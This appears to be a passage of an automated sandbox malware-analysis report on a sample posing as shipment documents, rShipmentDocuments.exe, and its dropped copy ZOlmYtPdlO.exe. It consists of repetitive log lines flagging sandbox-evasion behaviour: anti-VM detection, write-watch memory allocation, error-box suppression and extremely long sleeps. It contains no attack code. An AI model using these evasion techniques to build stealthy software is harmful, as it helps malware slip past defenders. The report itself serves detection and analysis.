Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: 1770000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: 32D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: 18E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: 93B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: A3B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: A5B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: B5B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: 2A30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: 2C10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Memory allocated: 4C10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 940000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 2810000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: CA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 8360000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 9360000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 9550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: A550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 1730000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 3060000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Memory allocated: 5060000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599805 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599687 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599578 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599469 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599359 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599250 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599140 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 599024 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598906 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598796 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598687 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598578 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598468 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598250 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598126 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 598000 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597890 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597669 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597533 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597387 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597275 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597154 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 597047 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596828 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596718 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596609 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596500 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596390 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596281 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596172 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 596062 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595953 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595843 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595734 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595625 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595515 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595406 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595297 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595187 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 595068 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594953 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594844 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594734 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594624 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594515 Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Thread delayed: delay time: 594406 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599779
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599292
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599175
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 599054
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598836
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598719
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598607
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598500
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598390
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598281
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598171
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 598062
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597953
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597843
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597624
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597296
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597187
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 597078
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596968
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596859
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596740
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596280
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596172
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595844
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Thread delayed: delay time: 595719
